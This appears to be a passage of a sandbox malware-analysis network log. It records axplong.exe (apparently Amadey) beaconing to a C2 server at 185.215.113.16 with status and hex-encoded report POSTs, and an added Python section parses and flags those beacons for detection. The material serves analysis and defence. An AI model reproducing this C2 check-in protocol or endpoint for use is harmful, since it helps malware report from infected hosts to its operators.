Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:51.015335083 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:51.016426086 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:51.241101027 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49835 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:51.359771013 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:52.086167097 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:52.120803118 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:52.350513935 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49837 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:52.465869904 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:53.176367998 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:53.177192926 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:53.412367105 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
42          192.168.2.4  49839        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:53.533193111 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
Sep 27, 2024 17:42:54.235832930 CEST  219                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
Sep 27, 2024 17:42:54.633291006 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:54.861355066 CEST  196                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
43          192.168.2.4  49841        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:54.982584000 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
Sep 27, 2024 17:42:55.687861919 CEST  219                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
Sep 27, 2024 17:42:55.688625097 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:55.915740967 CEST  196                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.4  49845        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:56.026388884 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
Sep 27, 2024 17:42:56.763569117 CEST  219                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
Sep 27, 2024 17:42:56.764302015 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:57.000869989 CEST  196                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.4  49848        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:57.375807047 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
Sep 27, 2024 17:42:58.039949894 CEST  219                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
Sep 27, 2024 17:42:58.040699005 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:58.272742987 CEST  196                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0
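
Sessions 42 to 45 above repeat the same two-step check-in: a POST of st=s to /Jo89Ku7d/index.php that the nginx front end answers with "Refresh: 0; url = Login.php" and a one-byte chunked body, followed by a POST of r= plus the same 152-character hex string (76 bytes; the report does not show how that value is encoded), answered with the chunked body " <c><d>". The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses such request/response pairs (including the chunked bodies), tags both exchanges, and measures the beacon cadence, which in these sessions is roughly one status POST per second. The C2 address, URI, hex blob, header values and timestamps are taken from the report; the Session record, the helper names and the benign control session (TEST-NET address 192.0.2.10) are constructed for the example.

```python
"""Tag Amadey-style C2 check-ins in captured HTTP sessions and measure their cadence.
Added example, not code from the Joe Sandbox report or from the sample: C2 IP, URI,
hex blob, header values and timestamps come from the report; the Session record,
helper names and the benign control session are constructed for this example."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

C2_IP = "185.215.113.16"                # from the report
C2_PATH = "/Jo89Ku7d/index.php"         # from the report
REPORT_HEX = (b"AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFB"
              b"B24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B"
              b"4C7966D0AB4C6EC28AB3156D80425B09")   # same 152 hex chars in every session

@dataclass
class Session:                          # constructed record: one request/response pair
    session_id: int
    timestamp: datetime
    dst_ip: str
    request: bytes
    response: bytes

def decode_chunked(body: bytes) -> bytes:
    """Reassemble a chunked body, e.g. b"7\\r\\n <c><d>\\r\\n0\\r\\n\\r\\n" -> b" <c><d>"."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)                  # ValueError on a truncated body
        size = int(body[pos:end].split(b";")[0], 16)    # drop any chunk extension
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2                                 # data plus its trailing CRLF

def parse_http(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split one HTTP message into start line, lower-cased headers and decoded body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    return lines[0], headers, body

REPORT_BODY = re.compile(rb"^r=(?:[0-9A-Fa-f]{2})+$")   # "r=" + even-length hex

def classify(request: bytes, response: bytes) -> Optional[str]:
    """Tag the two exchanges seen in the report; anything else returns None."""
    req_line, req_hdr, req_body = parse_http(request)
    parts = req_line.split(" ")
    if (len(parts) < 3 or parts[0] != "POST" or not parts[1].endswith("/index.php")
            or req_hdr.get("content-type", "") != "application/x-www-form-urlencoded"):
        return None
    _, resp_hdr, resp_body = parse_http(response)
    refresh = resp_hdr.get("refresh", "").replace(" ", "").lower()
    if req_body == b"st=s" and refresh == "0;url=login.php":
        return "amadey-status-beacon"
    if REPORT_BODY.match(req_body) and resp_body.strip() == b"<c><d>":
        return "amadey-report"
    return None

def find_beacons(sessions: List[Session]) -> List[Tuple[int, str]]:
    """(session_id, tag) for every session that matches either exchange."""
    tagged = ((s.session_id, classify(s.request, s.response)) for s in sessions)
    return [(sid, tag) for sid, tag in tagged if tag]

def beacon_intervals(sessions: List[Session]) -> List[float]:
    """Seconds between consecutive status beacons to the same destination."""
    by_dst: Dict[str, List[datetime]] = {}
    for s in sorted(sessions, key=lambda x: x.timestamp):
        if classify(s.request, s.response) == "amadey-status-beacon":
            by_dst.setdefault(s.dst_ip, []).append(s.timestamp)
    return [(b - a).total_seconds()
            for stamps in by_dst.values() for a, b in zip(stamps, stamps[1:])]

def _post(host: str, path: str, body: bytes) -> bytes:
    """Request built byte-for-byte like the report's (156 bytes for st=s, 308 for r=...)."""
    head = (f"POST {path} HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Host: {host}\r\nContent-Length: {len(body)}\r\nCache-Control: no-cache\r\n\r\n")
    return head.encode() + body

_NGINX = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nContent-Type: text/html; charset=UTF-8\r\n"
          b"Transfer-Encoding: chunked\r\nConnection: keep-alive\r\n")
RESP_STATUS = _NGINX + b"Refresh: 0; url = Login.php\r\n\r\n1\r\n \r\n0\r\n\r\n"   # body " "
RESP_REPORT = _NGINX + b"\r\n7\r\n <c><d>\r\n0\r\n\r\n"                          # body " <c><d>"

SAMPLE_SESSIONS = [   # sessions 42-45 from the report, plus one constructed benign control
    Session(42, datetime(2024, 9, 27, 17, 42, 53, 533193), C2_IP, _post(C2_IP, C2_PATH, b"st=s"), RESP_STATUS),
    Session(42, datetime(2024, 9, 27, 17, 42, 54, 633291), C2_IP, _post(C2_IP, C2_PATH, b"r=" + REPORT_HEX), RESP_REPORT),
    Session(43, datetime(2024, 9, 27, 17, 42, 54, 982584), C2_IP, _post(C2_IP, C2_PATH, b"st=s"), RESP_STATUS),
    Session(44, datetime(2024, 9, 27, 17, 42, 56, 26388), C2_IP, _post(C2_IP, C2_PATH, b"st=s"), RESP_STATUS),
    Session(45, datetime(2024, 9, 27, 17, 42, 57, 375807), C2_IP, _post(C2_IP, C2_PATH, b"st=s"), RESP_STATUS),
    Session(99, datetime(2024, 9, 27, 17, 43, 0, 0), "192.0.2.10",       # constructed, TEST-NET address
            _post("192.0.2.10", "/contact/index.php", b"name=a&msg=hi"),
            b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 13\r\n\r\n<html></html>"),
]

if __name__ == "__main__":
    print(find_beacons(SAMPLE_SESSIONS))
    print([round(g, 2) for g in beacon_intervals(SAMPLE_SESSIONS)])
```

Run as a script it lists the five flagged sessions and the three gaps between status beacons (about 1.0 to 1.5 s). Matching on the request body together with the server's reply (the Refresh to Login.php, the <c><d> body) rather than on the URI alone keeps the check from depending on the /Jo89Ku7d path, which is specific to this sample, while the cadence measurement gives a second, independent signal for a host that POSTs to a bare IP address every second.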


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.4  49850        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:58.386059999 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
Sep 27, 2024 17:42:59.085181952 CEST  219                IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 15:42:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
Sep 27, 2024 17:42:59.086059093 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:59.314188004 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:59 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49853 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:59.436224937 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:00.127280951 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:43:00.128468990 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:43:00.351398945 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49856 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:43:00.465286016 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:43:01.174545050 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:43:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
